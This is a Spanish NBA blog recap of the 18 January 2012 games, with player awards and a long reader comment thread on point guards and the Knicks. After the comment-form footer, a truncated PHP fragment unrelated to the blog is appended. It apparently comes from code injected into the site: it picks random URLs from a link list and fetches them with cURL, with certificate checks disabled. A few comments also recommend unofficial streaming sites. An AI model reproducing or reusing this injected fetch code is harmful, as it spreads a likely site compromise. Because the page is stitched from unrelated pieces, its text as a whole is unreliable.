La Crónica: NBA en estado puro

19 de January de 2012 por TheDeerHunter

A priori nadie lo hubiera dicho, pero la de anoche fue una de las jornadas más entretenidas de lo que llevamos de curso. De 11 partidos disputados sólo 1 se resolvió por más de 10 puntos. En los restantes hubo sorpresas, buzzer beaters, prórrogas… No se puede pedir más. “I love this game”.

La sorpresa del día fue la derrota en Washington de los Thunder (102-105). Durant y Westbrook en su línea pero el resto de compañeros estuvo bastante flojos. Por esta vez los viajes a la línea de tiros libres les pasó factura a ellos con 31 puntos de los Wizards llegados desde este punto. Y perfectamente hubiera podido ser peor sin el 1 de 6 de McGee. El control de los tableros también benefició a los locales, que disfrutaron de una extraordinaria actuación de Wall y Young, además de Crawford saliendo desde el banco.

Pero hubo más. Otra sorpresa, si se puede llamar así, fue el nuevo descalabro de los Knicks en el Madison, esta vez ante los débiles Suns y Nash tocando la guitarra ante su ex-técnico (91-88). Más sorprendente aún fue la remontada de los Kings ante Pacers (88-92), con un apagón preocupante de éstos en el último cuarto.

Los Spurs se estrenaron a domicilio doblegando a los Magic en la prórroga (85-83). Los locales no supieron traducir más de 20 rebotes de diferencia en ventaja en el marcador por culpa de sus malos porcentajes de tiro. Por su parte, los Spurs sobrevivían a base de penetraciones de Tony Parker. Al final la igualdad se rompió con una jugada polémica en la que Jefferson cometía campo atrás y además le regalaban una falta inexistente. JJ Reddick falló el triple para ganar o perder.

También por la prórroga se resolvió el Denver@Philadelphia (108-104). Partidazo bestial de André en la visita a su antigua parroquia. Los locales notaron el flojo rendimiento de sus titulares y únicamente Thaddeus y Turner se mostraron acertados. Un único error en un tiro libre por parte de Iguodala evitó la victoria local y en el tiempo extra los Nuggets se encontraron aún más cómodos.

Clutch de Billups para tumbar a los campeones en el Staples… y eso que tampoco jugó Chris Paul (89-91). Sí lo hizo Mo Williams a un nivel espectacular. Los Mavs andan flojísimos.

En el resto de choques: cómoda victoria de Celtics ante Toronto (73-96), aunque susto de Rondo; victoria de los Nets ante Warriors con un último cuarto decisivo de Deron (100-107); los Hawks doblegaron a los Blazers en una excelente racha desde que se lesionó Horford (89-92); también buena racha la que acumulan los Grizzlies con su victoria en New Orleans (93-87) y Marc comiéndose a Kaman&Okafor. Finalmente 6ª victoria de los Wolves, ésta ante Detroit, en otro buen partido de Love y Ricky (85-93).

PREMIOS

MVP: Steve Nash y Andre Miller. Dos viejos rockeros a los que echaremos en falta cuando no estén. El primero liquidó a los Knicks contrapronóstico con 26 puntos y 11 asistencias y el 2º lideró a los Nuggets en un duro partido frente los Sixers con 28 puntos, 8 rebotes y 10 asistencias. Marc Gasol fue otro de los destacados de la noche: 22 puntos, 12 rebotes y 7 asistencias.

Rookie: Antes del draft se comparaba a Marshon Brooks con Kobe Bryant y salvando las distancias, el de los Nets no desentona. Gran actuación de 22 puntos, 8 rebotes y 6 asistencias. Iman Shumpert es otra de las sorpresas del draft. En un horrible partido de Melo&Amare él se fue a los 20 puntos, 4 rebotes y 4 robos. La hoja de estadística de Ricky Rubio es para revisarla 2 veces: 9 puntos, 7 rebotes, 8 asistencias y 6 robos. Lástima de ese 1 de 8 en tiro.

Sorpresa: 29 puntos de Tayshaun Prince. Uno de los expedientes X de la temporada es la razón por la cual Prince renovó con los Pistons y no por algún equipo con objetivos más ambiciosos. O aunque sea con algún objetivo.

Decepción: 2 de 16 de Jameer Nelson justo cuando en el blog se debatía sobre su calidad. Eso es ser oportuno. El 12 de 44 de la pareja Carmelo Anthony-Amare Stoudamire también da penita teniendo en cuenta lo que han tenido que dar los Knicks para reunirlos en la Gran Manzana.

Esfuerzo en vano: 17’6 rebotes de media lleva Dwight Howard en los últimos 5 partidos. Anoche fueron 25 y 24 puntos que no sirvieron para amarrar la victoria frente SA. Los 36 puntos de Russell Westbrook también se fueron al limbo.

Imágenes | AP Photos / Getty Images

Comenta

44 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Steve Nash tiene una predisposición genética para liársela a sus ex. Cuando pone la bala sobre su objetivo, su ”hobbie’ es matar ese objetivo una y otra vez. A los ‘Mavs’ ya les tiene locos. Siempre o casi siempre se les carga, demostrándoles su error por no dar todos los millones por él en 2004 cuando quedó libre (cagada del ‘millonetis’ por excelencia Mark Cuban) y ahora le toca al señor D’Antoni, al que siempre le recordará que el chef del Run&Gun dirigía desde el parqué, y no desde el banquillo. BRAVO, BRAVÍSIMO NASH.

    Sobre Prince, así como sobre Shumpert, decir que soy el jugador de hoops más estúpido de la temporada… XD. No así con la zorra de DeMar. Mientras, Alonzo Gee sigue estando en mi roster… En fin. Lo tenía que declarar al mundo, jeje

      Citar

  2. shaggy dice:
    #2

    Nash se merece acabar su carrera en un equipo con aspiraciones, no en la banda esa de los Suns….

      Citar

  3. rumbero dice:
    #3

    Más que un anillo este tio se merece que cuando se retire creen el trofeo Steve Nash para nombrar al “Jugador que más no ha hecho disfrutar del baloncesto” cada temporada. Jugón

    Y lo de los Wizards tiene tela. Haciendo el “ridículo” toda la temporada y vienen los todopoderosos Thunder y…ohh sorpresa! Si saben jugar! A ver si se ponen las pilas definitivamente porque talento no les falta (Tranquilo Sancho, yo ha sido soltar a Young en el hoops y empezar a salirse tb xD)

      Citar

  4. simon dice:
    #4

    Pufff que penita me dan los knicks. Ya lo pensaba el año pasado cuando hicieron el traspaso de Melo, y se está confirmando, los Knicks no ganaron nada en el traspaso con Denver ( vease como estaba y está Denver, vease como estaban y estan los Knicks ). No estoy diciendo que Carmelo no sea un grandísimo jugador pero no creo que sea mejor que el trio Fields, Gallinari, Felton ni de coña vamos… y más con el subidón que esta teniendo Gallinari y lo que se estorban Amaré Y Anthony,.. la única solución que veo para estos Knicks es que D´antony se vaya o que Nash fiche por este equipo y los haga jugar ( Anthony en ese caso tendría que asumir un papel ejecutor y olvidarse de amasar la bola ) tienen buenos mimbres estos Knicks pero no creo que sus dos estrellas sean las mas adecuadas para estar en una misma plantilla ( deberían dejar volar a uno de ellos??? ) yo personalmente traspasaria a Anthony ¿ por quién ? no lo tengo tan claro.

      Citar

  5. simon dice:
    #5

    Rumbero me apunto a la creación de ese premio!!!!

      Citar

  6. simon dice:
    #6

    simon:
    No estoy diciendo que Carmelo no sea un grandísimo jugador pero no creo que sea mejor que el trio Fields, Gallinari, Felton

    Ups perdon!! donde dije Fields, digo Wilson Chandler.

      Citar

  7. MagicJohnson32 dice:
    #7

    No tendré el mal gusto y el oportunismo facilón de restregarle a Denise el 2 de 16 de Jameer Nelson. Estaría feo. Además, ya tiene suficiente el pobre Denise con aguantarlo como el base titular de sus Magic :-p

      Citar

  8. simon dice:
    #8

    Por cierto, aunque no me caigan muy bien, pero os habeis parado a pensar en la posibilidad de que Nash fiche por los Heat el año que viene??? yo no se a vosotros pero a mi imaginarmelo lanzando el contrataque para que Lebron / Wade/ Bosh culminen me pone… los haría imparables…

      Citar

  9. GreenPride dice:
    #9

    Día de sorpresas y temporada convulsa en sus inicios como muchos esperábamos. Los equipos aspirantes se están dejando muchos partidos y hay una cierta inestabilidad debido a lo apretado del calendario, lesiones y pocos entrenamientos de los equipos.
    Para mí, a parte de unos Celtics que dan señales preocupantes (Rondo al margen), la gran desilusión son los Knicks. Con Amare y Carmelo jugando a este nivel no les da ni para ir a los PO. Muchos abogan que no son compatibles, pero ¿de verdad se estorban? Quizás mucho tenga que ver con la falta de un base de verdad que les ponga a cada uno en su sitio, que impida a Carmelo amasar tanta bola y ordene jugadas a las que hagan caso estos dos. Malas pintas a no ser que Baron Davis vuelva en plan año del “We Belive”.
    Por otra parte sorpresa en la derrota de los Thunder ante unos Wizards que ya empezaron a mejorar los últimos partidos.
    Lo de Tayshaun Prince y su renovación sí es un misterio. Supongo que las razones que le mantuvieron en Detroit serán de tipo personal y que no querrá mover familia o algo por el estilo porque deportivamente no se entienden, con lo bien que vendría este jugador a muchísimos aspirantes. ¿Verdad Lakers, Celtics o Clippers, por decir 3 claros ejemplos?

      Citar

  10. HeiNeKeN dice:
    #10

    Muy buen partido de DeAndre Jordan 19-9 y 5 tapones.

    Por cierto, el bloqueo de Blake a Kidd es de los que te dejan para el arrastre durante días, madre mia jajjaa

      Citar

  11. TheDeerHunter dice:
    #11

    MagicJohnson32:
    No tendré el mal gusto y el oportunismo facilón de restregarle a Denise el 2 de 16 de Jameer Nelson. Estaría feo. Además, ya tiene suficiente el pobre Denise con aguantarlo como el base titular de sus Magic :-p

    Es que a Denise le pierden sus prejuicios.
    Yo creo que ningún aficionado Laker cambiaría a Fisher por Nelson ni a punta de pistola… y eso que lo que menos entendemos nosotros es esa ceguera, cuando con Fisher en lugar de Nelson vosotros tendríais un anillo más (quiero decir un anillo) y nosotros uno menos. XD XD XD

    Pero es que aunque admitieramos que no somos objetivos con Fisher (y razones tenemos de sobra para no serlo) las frías cifras nos señalan parte de la realidad. En el PER de Hollinger Fisher marca un 9.61 y Nelson un 9.59… sin haber ganado ningún partido para su equipo como sí lo ha hecho Fisher “el exjugador”

    ¿Cuándo se cansará Fisher en pegar ZAS, EN TODA LA BOCA a sus críticos? Ójala no lo haga nunca.

      Citar

  12. Sancho88 dice:
    #12

    deer, te motivas con fisher porque lo tienes en la hoops capuyo, jeje. pero es un pakete con ojos

      Citar

  13. Sancho88 dice:
    #13

    Corrijo, lo tiene Einfante. Te motivarás con él por alguna razón extraña que nadie excepto tú conoces, jeje.

    Por cierto Einfante, te motiva a ti un Radmanovic por Fisher? xd

      Citar

  14. Denise dice:
    #14

    Aprovechais un mal partido y un pequeño bache de Nelson para crucificarlo. Nelson es un buen base, cualquier equipo le gustaría tenerlo, y Fisher está absolutamente acabado. Otra cosa es que le tengais aprecio por su trayectoria, pero está acabado.
    Que el otro día metiera un triple que decidiera el partido no lo exhime de que ya no vale un pimiento. Como ya dije en un post hace meses, que algun dia ganase un partido con un triple sobre la bocina no indica nada, cualquier jugador profesional de cualquier categoría lo puede hacer en un momento determinado.
    Eso sí, cuando Fisher se marque sus ya habituales 2-9 con 25 puntos del base titular rival no seré tan oportunista.

      Citar

  15. Sancho88 dice:
    #15

    yo estoy contigo Denise, a mí Nelson me gusta y ya lo dije el otro día, para mí está infravaloradísimo

    Por cierto, reabro viejos debates

    Which rookie point guard would you build your team around?

    Kyrie Irving
    551 – 25%

    Ricky Rubio
    1632 – 75%

    NBA.COM

      Citar

  16. TheDeerHunter dice:
    #16

    A ver nenes, que el PER de Hollinger no es oportunismo. Es lo que promedian unos y otros esta temporada, sumando 5 minutos más Nelson que Fisher este curso. No lo digo yo.

    El ratio de asistencias de Fisher es ahora mismo el 5º entre todos los bases de la liga. (calculado vía esta fórmula: Assist Ratio – the percentage of a player’s possessions that ends in an assist. Assist Ratio = (Assists x 100) divided by [(FGA + (FTA x 0.44) + Assists + Turnovers])
    De hecho, jamás ha dado tantas asistencias (tocate las narices… ahora que es un ex-jugador)

    El que repitáis como papagallos que está acabado no es ni de lejos la verdad. Fisher cumple siempre, en un papel de titular muy complicado (en un Kobe-sistema) como titular en un equipo que gana 2/3 partes de sus partidos.
    Estoy bien seguro, sin oportunismos ni gaitas, que:
    1) Nelson (y un buen puñado de bases titulares) está haciendo objetivamente peor campaña que Fisher, un exjugador según vosotros.
    2) Nelson ni naciendo 14 veces podría firmar la carrera de Fisher.

      Citar

  17. TheDeerHunter dice:
    #17

    Y no creo que sea infravalorarlo. Nelson, como atacante individualmente puede medio valer… pero como director de juego y como defensor es, ha sido siempre y será de lo peor de toda la NBA, aunque da la casualidad de que esta es su peor temporada desde que fue rookie.
    Creo que es uno de los peores bases que le podrían haber caido en suerte a Dwight Howard.

      Citar

  18. shaggy dice:
    #18

    Os imaginais la renovacion de Howard por los Magic y que Nash firmase como FA por ellos tambien?

      Citar

  19. Denise dice:
    #19

    TheDeerHunter: A ver nenes, que el PER de Hollinger no es oportunismo. Es lo que promedian unos y otros esta temporada, sumando 5 minutos más Nelson que Fisher este curso. No lo digo yo.El ratio de asistencias de Fisher es ahora mismo el 5º entre todos los bases de la liga. (calculado vía esta fórmula: Assist Ratio – the percentage of a player’s possessions that ends in an assist. Assist Ratio = (Assists x 100) divided by [(FGA + (FTA x 0.44) + Assists + Turnovers])De hecho, jamás ha dado tantas asistencias (tocate las narices… ahora que es un ex-jugador)El que repitáis como papagallos que está acabado no es ni de lejos la verdad. Fisher cumple siempre, en un papel de titular muy complicado (en un Kobe-sistema) como titular en un equipo que gana 2/3 partes de sus partidos.Estoy bien seguro, sin oportunismos ni gaitas, que:1) Nelson (y un buen puñado de bases titulares) está haciendo objetivamente peor campaña que Fisher, un exjugador según vosotros.2) Nelson ni naciendo 14 veces podría firmar la carrera de Fisher.

    Pero no hagas demagogia ni malinterpretes comentarios.

    Nadie ha dicho que Nelson vaya a hacer mas carrera que Fisher en su vida. Ahora, en este momento, a 19 de enero de 2012 a las 16:27 Nelson es mil veces mejor jugador que Fisher. Y el 99,9 % de fans de Lakers (el 0,01 % restante sois algunos de vosotros, firmaria tenerlo de base titular antes que a Fisher y a Blake.

    Y comparar quien es mejor, si el actual Fisher o el actual Nelson es un debate con un ganador tan claro que no merece la pena ni comentar mas el tema

      Citar

  20. Nacho dice:
    #20

    Denise: Pero no hagas demagogia ni malinterpretes comentarios.Nadie ha dicho que Nelson vaya a hacer mas carrera que Fisher en su vida. Ahora, en este momento, a 19 de enero de 2012 a las 16:27 Nelson es mil veces mejor jugador que Fisher. Y el 99,9 % de fans de Lakers (el 0,01 % restante sois algunos de vosotros, firmaria tenerlo de base titular antes que a Fisher y a Blake.Y comparar quien es mejor, si el actual Fisher o el actual Nelson es un debate con un ganador tan claro que no merece la pena ni comentar mas el tema

    Tú lo que quieres es largarlo a LA como sea. Normal, es lo que querría el 99% de los fans de los Magic.
    ¿a quien tienes en la recámara?

      Citar

  21. TheDeerHunter dice:
    #21

    Denise: Pero no hagas demagogia ni malinterpretes comentarios.

    Nadie ha dicho que Nelson vaya a hacer mas carrera que Fisher en su vida. Ahora, en este momento, a 19 de enero de 2012 a las 16:27 Nelson es mil veces mejor jugador que Fisher. Y el 99,9 % de fans de Lakers (el 0,01 % restante sois algunos de vosotros, firmaria tenerlo de base titular antes que a Fisher y a Blake.

    Y comparar quien es mejor, si el actual Fisher o el actual Nelson es un debate con un ganador tan claro que no merece la pena ni comentar mas el tema

    Lo de la carrera lo he añadido yo. Pero lo de que el actual Nelson es 1000 veces mejor que nadie es directamente delirius tremens.

    Vamos, que lo achaco a lo que dice Nacho, que nos quieres vender la moto más por tus deseos de que se pire que por otra cosa.

    Yo también estaría cabreado, Denise. ¡Estamos contigo!!

      Citar

  22. TheDeerHunter dice:
    #22

    Por cierto, Denise… por curiosidad andaba mirando quien tiene a Nelson en la hoops. Lo tiene scoorp (que no sé muy bien quién es por aquí) y como 4º base.
    Si tanto te mola podrías intentar ofrecerle… no sé, a Batum. Así podrías emular ese backcourt de “ensueño” Nelson-Richardson-Reddick XD XD XD XD
    (y el caso es que siempre pensé que Richardson podía funcionar en Orlando y aún no he perdido la fe en Reddick)

      Citar

  23. Denise dice:
    #23

    TheDeerHunter:
    Por cierto, Denise… por curiosidad andaba mirando quien tiene a Nelson en la hoops. Lo tiene scoorp (que no sé muy bien quién es por aquí) y como 4º base.
    Si tanto te mola podrías intentar ofrecerle… no sé, a Batum. Así podrías emular ese backcourt de “ensueño” Nelson-Richardson-Reddick XD XD XD XD
    (y el caso es que siempre pensé que Richardson podía funcionar en Orlando y aún no he perdido la fe en Reddick)

    Lo que haga Scoorp con su equipo me da igual, alla él, ni que eso fuera una referencia.

    Y no, no tengo ningún motivo para querer que Nelson se vaya. Es un pedazo de base impresionante. Aunque si quieres, te lo cambiamos por tu ídolo Luke Walton.

    Tiempo al tiempo, ya pondrá a cada uno en su sitio y ya Nelson callará bocas por aquí.

      Citar

  24. guisante dice:
    #24

    Oye, perdonad, sabeis de alguna página para ver los partidos de NBA en diferido?
    Gracias.

      Citar

  25. melo15 dice:
    #25

    Hombre Denise tampoco te motives, que lo de un pedazo de base impresionantre, rivaliza con mis alabanzas ( totalmente justas) a Melo

      Citar

  26. Txusma dice:
    #26

    Yo tengo a Nelson en otra liga y mejor que vaya espabilando que anda por detrás de Ellis, Jack, Holiday y Teague (sí, tengo tropecientos base. Q pasa? :D)

      Citar

  27. Sancho88 dice:
    #27

    Melo, si sabes utilizar una palabra tan bonita del diccionario como alabanzas, no me cuadran tus ‘haigan’ o ‘abujeros’. No sé que habrá pasado con tu vida hoy, quizá te empezaste el quijote o algo asi…

      Citar

  28. melo15 dice:
    #28

    Si tio me he replanteado, mi falta de vocabulario, a aprtir de ahora, voi a comentar mas enserio

      Citar

  29. Denise dice:
    #29

    melo15:
    Si tio me he replanteado, mi falta de vocabulario, a aprtir de ahora, voi a comentar mas enserio

    jajaja si, te lo estas tomando muy “enserio”

    Con Nelson estais aprovechando este mal momento para ponerlo como si fuese un Royal Ivey, bueno, ya se cerrarán bocas, como el trato que está recibiendo Westbrook en el analisis de los Thunder..totalmente desproporcionado en mi opinion

    Esta noche hay un Heat-Lakers, como soy valiente, me mojo y vaticino un repaso de los Heat al Kobe-Sistema de Lakers.

      Citar

  30. melo15 dice:
    #30

    En eso estoy de acuerdo Denise, Westbrook, es un pedazo de base, lo tiene todo, Anotacio, Fisico, Defensa, Direccion ( un poco) si se adapta a su papel de escudero, y dejase a Durant el papel de super estrella, les iris mucho mejor.

      Citar

  31. Javijaen dice:
    #31

    Por Dios, vaya cuatro derrotitas seguidas de los Knicks, desde la fácil de Memphis, a la arrolladora de Oklahoma, el bajón ante Orlando y para acabar ayer con Phoenix de Nash, dueño y señor, y eso que Fields-Shumpert estuvieron bastante bien.
    Señor D´Antoni, piense algo más elaborado que el ataque ultra-estático y previsible que hace TODOS los partidos, porque el dia que Carmelo está de cruz no hay nada que hacer.
    Por cierto, octavos de conferencia, y justo detrás unos de esos “corazón de campeón”….

      Citar

  32. HisRoyalAirness dice:
    #32

    Denise: jajaja si, te lo estas tomando muy “enserio”

    Con Nelson estais aprovechando este mal momento para ponerlo como si fuese un Royal Ivey, bueno, ya se cerrarán bocas, como el trato que está recibiendo Westbrook en el analisis de los Thunder..totalmente desproporcionado en mi opinion

    Esta noche hay un Heat-Lakers, como soy valiente, me mojo y vaticino un repaso de los Heat al Kobe-Sistema de Lakers.

    Lo dudo macho, Wade no juega y Lebron es seria duda. Huele a merienda de los angelinos

      Citar

  33. HisRoyalAirness dice:
    #33

    guisante:
    Oye, perdonad, sabeis de alguna página para ver los partidos de NBA en diferido?
    Gracias.

    En rojadirecta hay una pestaña arriba que pone “partidos en descarga”; ahí los suben todos

      Citar

  34. guisante dice:
    #34

    HisRoyalAirness: En rojadirecta hay una pestaña arriba que pone “partidos en descarga”; ahí los suben todos

    pero en streaming sabeis alguna?

      Citar

  35. Sancho88 dice:
    #35

    guisante, yo los sigo por firstrow, pero me acabo siempre desesperando por los plugins y los parones… al final me pongo el boxscore y rezo porque me toque la lotería y ponga el satélite para dormirme con daimiel todas las noches, xd

      Citar

  36. Nacho dice:
    #36

    Sancho88: guisante, yo los sigo por firstrow, pero me acabo siempre desesperando por los plugins y los parones… al final me pongo el boxscore y rezo porque me toque la lotería y ponga el satélite para dormirme con daimiel todas las noches, xd

    ¿Y eso de dormirte con Daimiel lo tienes ya hablado con Melo?

    melo15: Si tio me he replanteado, mi falta de vocabulario, a aprtir de ahora, voi a comentar mas enserio

    Sí tío, me he replanteado mi falta de vocabulario. A partir de ahora voy a comentar más en serio.
    No me extraña que ya te la empiece a pegar Sancho con Daimiel.
    ¡Montes! ¿Dónde estás?
    P:D: Me voy a dormir y pensaré si levantarme a las 2. ¡Pufff, me aburren tanto estos Lakers!

      Citar

  37. MagicJohnson32 dice:
    #37

    HisRoyalAirness: Lo dudo macho, Wade no juega y Lebron es seria duda. Huele a merienda de los angelinos

    LeBron juega. No se va a perder por un constipado un partido por TV nacional contra Lakers.

      Citar

  38. Sancho88 dice:
    #38

    Nacho, respondiéndote en modo Daimiel…

    “Hombre, ya se sabe con esto de los matrimonios y las bodas.. no?. Es un royo. Al final, siempre pasa lo mismo no? que se besen, que se besen… el padrino cortando la corbata, los novios con la tarta… y los regalos. Siempre hay que regalar algo no? Yo recuerdo una boda, recuerdo una boda en la que muchos invitados fueron a la ceremonia pero no fueron al convite por un Real Madrid-Barsa. Hay que tener cuidado con las fechas de las bodas”.

      Citar

  39. MagicJohnson32 dice:
    #39

    Ricky es el 3er G más votado ahora mismo en el Oeste para el All-Star:

    Guards: Kobe Bryant (LAL) 1,110,379; Chris Paul (LAC) 835,026; Ricky Rubio (Min) 248,423; Steve Nash (Pho) 188,537; Russell Westbrook (OKC) 167,996; Kyle Lowry (Hou) 132,972; Monta Ellis (GS) 105,926; Manu Ginobili (SA) 79,821; Jason Kidd (Dal) 79,783; Chauncey Billups (LAC) 73,429.

      Citar

  40. arvydas dice:
    #40

    MagicJohnson32 el otro día leí este comentario http://blog.tjnba.com/2012/01/17/la-cronica-los-thunder-lideran-la-clasificacion/#comment-38668, que me llevo al articulo que me dio la idea para hacer esto http://wherefuckingamazinghappens.tumblr.com/post/16142653923/derek-fisher-the-reflective

    Seguro que lo disfrutas xd
    Gracias por la idea!!

      Citar

  41. MagicJohnson32 dice:
    #41

    arvydas:
    MagicJohnson32 el otro día leí este comentario http://blog.tjnba.com/2012/01/17/la-cronica-los-thunder-lideran-la-clasificacion/#comment-38668, que me llevo al articulo que me dio la idea para hacer esto http://wherefuckingamazinghappens.tumblr.com/post/16142653923/derek-fisher-the-reflective

    Seguro que lo disfrutas xd
    Gracias por la idea!!

    OMG!! Si fuese escultor, te haría un monumento, jaja. ¡Enorme, gracias!

      Citar

  42. melo15 dice:
    #42

    Bastante injusto lo de Ricky, los Wolves son malisimos, y el esta jugando bien, pero tampoco tanto, Westbrook, tanbien esta jugando de coña, y Lowry ni te cuento

      Citar

  43. Rompe dice:
    #43

    Ya vemos en el oeste dos equipos con balance positivo y fuera de PO… Justo lo contrario que en el este! Estas cosas no cambian nunca!

      Citar

  44. Sancho88 dice:
    #44

    bueno, en la hoops sí que cambian. allí la conferencia magic (oeste) es mucho más débil que la bird (este).

    Ya se sabe, el este mola más. xd

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>